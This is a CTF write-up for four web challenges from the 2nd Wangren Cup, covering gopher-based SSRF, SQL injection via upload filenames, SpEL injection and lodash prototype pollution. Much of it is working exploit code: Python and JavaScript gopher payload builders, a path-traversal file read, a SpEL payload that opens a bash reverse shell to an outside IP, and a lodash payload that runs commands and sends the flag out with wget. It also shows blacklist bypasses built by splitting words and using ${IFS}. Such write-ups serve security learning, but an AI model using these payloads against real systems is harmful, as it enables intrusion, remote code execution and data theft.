
[PHP Knowledge Base] 2nd Wangren Cup (网刃杯) WEB

Sign_in

An SSRF challenge.

First look at the network situation by reading the ARP table through the file:// handler:

http://124.222.173.163:20003/?url=file:///proc/net/arp


The ARP table lists a neighbour ending in .100 (172.73.26.100) that looks out of place, so visit it.

After that it is only a matter of adding the X-Forwarded-For and Referer headers the backend expects and delivering the request through gopher.

Exploit:

import urllib.parse

# Raw HTTP request that the SSRF endpoint will replay to the internal host.
# X-Forwarded-For claims a loopback origin; Host and Referer are the values the backend wants.
payload = """POST /?a=1 HTTP/1.1
Host: bolean.club
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
X-Forwarded-For: 127.0.0.1
Referer: bolean.club

b=1
"""
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A', '%0D%0A')          # HTTP wants CRLF line endings
# '_' is the gopher item-type byte; the handler drops it and sends the rest to the socket as-is
gopher = 'gopher://172.73.26.100:80/_' + new
# The gopher URL is passed in a GET parameter, so it has to be URL-encoded a second time.
# Only the parameter value is encoded; encoding '?url=' as well would turn it into part of the path.
result = '?url=' + urllib.parse.quote(gopher, safe='')
print(result)
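As an added example (not the write-up's exp), the same gopher payload built from structured fields instead of a hand-typed request: Content-Length is computed from the body, line endings are forced to CRLF, and the two encoding layers are kept apart so it is obvious which side decodes which. The target, path and headers are the ones the write-up used against the internal host; the helper names are my own.

```javascript
// Added example: assemble a gopher:// SSRF payload that carries a raw HTTP request.
// Host, path and headers mirror the write-up; everything else is illustrative.

function buildRawHttpRequest({ method = 'GET', path = '/', headers = {}, body = '' }) {
  const hdrs = { ...headers };
  if (body.length > 0 && !('Content-Length' in hdrs)) {
    hdrs['Content-Length'] = String(Buffer.byteLength(body, 'utf8')); // bytes, not characters
  }
  const lines = [`${method} ${path} HTTP/1.1`];
  for (const [name, value] of Object.entries(hdrs)) lines.push(`${name}: ${value}`);
  // HTTP/1.1 requires CRLF terminators and one empty line between headers and body
  return lines.join('\r\n') + '\r\n\r\n' + body;
}

// Percent-encode every byte outside the unreserved set so CR, LF and spaces
// survive inside the URL; working on bytes keeps non-ASCII bodies correct too.
function percentEncode(str) {
  return Array.from(Buffer.from(str, 'utf8'), (b) => {
    const ch = String.fromCharCode(b);
    return /[A-Za-z0-9\-._~]/.test(ch) ? ch : '%' + b.toString(16).toUpperCase().padStart(2, '0');
  }).join('');
}

// The byte after the slash is the gopher item type and is discarded by the
// receiving handler ("_" is the usual filler); the rest is sent to the server
// as the selector, which is what lets gopher smuggle an arbitrary TCP payload.
function buildGopherUrl(host, port, rawRequest) {
  return `gopher://${host}:${port}/_${percentEncode(rawRequest)}`;
}

// The gopher URL itself travels inside a GET parameter, so it is encoded once
// more: the web server decodes one layer, the gopher handler the other.
function buildSsrfQuery(gopherUrl, param = 'url') {
  return `?${param}=${encodeURIComponent(gopherUrl)}`;
}

function writeupPayload() {
  const raw = buildRawHttpRequest({
    method: 'POST',
    path: '/?a=1',
    headers: {
      Host: 'bolean.club',
      'Content-Type': 'application/x-www-form-urlencoded',
      'X-Forwarded-For': '127.0.0.1',
      Referer: 'bolean.club',
    },
    body: 'b=1',
  });
  const gopherUrl = buildGopherUrl('172.73.26.100', 80, raw);
  return { raw, gopherUrl, query: buildSsrfQuery(gopherUrl) };
}

console.log(writeupPayload().query);
```

Run it with node and append the printed query to the challenge URL; the doubly encoded `%250D%250A` sequences are the CRLFs that the target web server will eventually see.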

FLAG:flag{Have_A_GoOd_T1m3!!!}

upload

The challenge hint says it is SQL-related, so upload any file with a single quote appended to the filename.

The response echoes the failing query:

Error: insert into upload_file values('9e55ed4dd2c3418a9f3c6b39c5fb2290.sql'');<br>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''9e55ed4dd2c3418a9f3c6b39c5fb2290.sql'')' at line 1

Use error-based injection to read the source; sqlmap can pull it out.

index.php

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>??€???????? </title>
</head>
<body>
    <form action="" method="post" enctype="multipart/form-data">
        <input type="file" name="upfile">
        <input type="submit" value="????? ">
    </form>
</body>
</html>
<?php
    ini_set('display_errors',1);        
    ini_set('display_startup_errors',1);
    error_reporting(-1);                  // verbose errors: the failing query is echoed back, which enables error-based injection
    $servername = "localhost";
    $username = "root";
    $password = "123456";
    $dbname = "upload";
     

    $conn = mysqli_connect($servername, $username, $password, $dbname);
    if(!empty($_FILES)){
        $filename_hz = explode(".", $_FILES['upfile']['name']);
        $name = array('jpg', 'jpeg' ,'png', 'gif');
        $filename_ = end($filename_hz);   // attacker-controlled "extension": everything after the last dot
        // the extension whitelist is skipped entirely when the client sends Content-Type: ctf
        if(in_array($filename_, $name) || $_FILES['upfile']['type'] == "ctf"){
            $tmpname   = $_FILES['upfile']['tmp_name'];
            $name      = $_FILES['upfile']['name'];
            $file_name = md5(date('YmdHis').rand(100,999).$name).'.'.$filename_;
            // $filename_ is concatenated unescaped: a quote in the extension breaks out of the string literal
            $sql = "insert into upload_file values('$file_name');";
            if (mysqli_query($conn, $sql)){
                if(move_uploaded_file($tmpname, './upload/'.$file_name)){
                    echo $name.""."/upload/$file_name";
                }else{
                    echo $name." ";
                }
            }else {
                echo "Error: " . $sql . "<br>" . mysqli_error($conn);
            }
        }else{
        echo "............ctf";
        }
    }

The source confirms the injection point: the extension only reaches the query if it is in the image whitelist or the upload's Content-Type is ctf, and it is concatenated unescaped (hence the sql' in the error above). With that, guess the flag table and column directly through the error messages.


FLAG:flag{5937a0b90b5966939cccd369291c68aa}

ez_java

  • SpEL injection

Arbitrary file read:

/download?filename=../../../web.xml

web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">
    <servlet>
        <servlet-name>DownloadServlet</servlet-name>
        <servlet-class>com.abc.servlet.DownloadServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>DownloadServlet</servlet-name>
        <url-pattern>/download</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>TestServlet</servlet-name>
        <servlet-class>com.abc.servlet.TestServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>TestServlet</servlet-name>
        <url-pattern>/test388</url-pattern>
    </servlet-mapping>

</web-app>

Download the two class files:

/download?filename=../../../classes/com/abc/servlet/TestServlet.class
/download?filename=../../../classes/com/abc/servlet/DownloadServlet.class

TestServlet.class has a SpEL injection; its blacklist is bypassed by splitting the blocked words with string concatenation ("java.l"+"ang.Ru"+"ntime", "ex"+"ec", "getRu"+"ntime").

URL-encode the payload and POST it for a reverse shell:

POST:
http://124.220.9.19:8025/test388

name=#{T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"bash","-c","bash -i >&/dev/tcp/1.116.110.61/3000 0>&1"})}


FLAG:flag{123awerghjvxcvcjfreawe}

ezjs

  • Prototype pollution
  • lodash

Checking the dependencies: lodash is used, and this version is vulnerable, so npm install it and debug locally.

The code shows that merge is reachable for prototype pollution, and that the template function is used afterwards.

This led to the article "From Lodash prototype-chain pollution to template RCE" on anquanke.com, which gets RCE through lodash.template by polluting sourceURL.

Payload:

{"__proto__":{"sourceURL":"\u000areturn e =>{return global.process.mainModule.constructor._load('child_process').execSync('id')}"}}

The challenge's blacklist is not given explicitly, so step through in the debugger, assuming an empty blacklist for now.

Break on template: Object's sourceURL has already been polluted.
template checks for a sourceURL value in options; options has none of its own, so the lookup walks the prototype chain up to Object, where the polluted value now exists.

At this point:

sourceURL = "//# sourceURL=\nreturn e =>{return global.process.mainModule.constructor._load('child_process').execSync('calc')}\n"

This string is concatenated into the second argument of Function (the function body), which gives arbitrary code execution.

Things to note

There is no require inside a Function-constructed scope (require is module-local, not a global), so calling require('child_process') directly throws; use global.process.mainModule.constructor._load instead.

On the Function constructor, see the article "Analysis of exploiting lodash in Node.js prototype-chain pollution":

var person = { age: 3 };
var myFunction = new Function("a", "return 1*a*this.age");
myFunction.apply(person, [2]);   // 6
// "return 1*a*this.age" is the functionBody argument, so whatever we inject there is executed.

A few payload variants tested locally all execute:

{"__proto__":{"sourceURL":"\u000areturn global.process.mainModule.constructor._load('child_process').execSync('calc')"}}

{"__proto__":{"sourceURL":"\nglobal.process.mainModule.constructor._load('child_process').execSync('calc')"}}

Then fuzz the challenge's blacklist by hand; the following are blocked:

space
require
return
execSync
curl
bash
wget
echo
flag
nl
tac
cat (not banned, but has no effect)
*
?

Final payload (spaces replaced by ${IFS}, blocked words split with "" and '+' concatenation, the flag exfiltrated in the wget request):

{
	"__proto__":{
		"sourceURL":
"\nglobal.process.mainModule.constructor._load('child_process').exec('wg'+'et${IFS}http://1.116.110.61:3000/`ta\"\"c${IFS}/.fl\"\"ag`')"
		}
}

Note: the request must be sent with Content-Type: application/json.

FLAG:flag{n0D3_1s_V3rY_v3Ry_very_v3rY_Fun_1sNt_it}

Added: 2022-05-01 15:30:26  Updated: 2022-05-01 15:30:45
 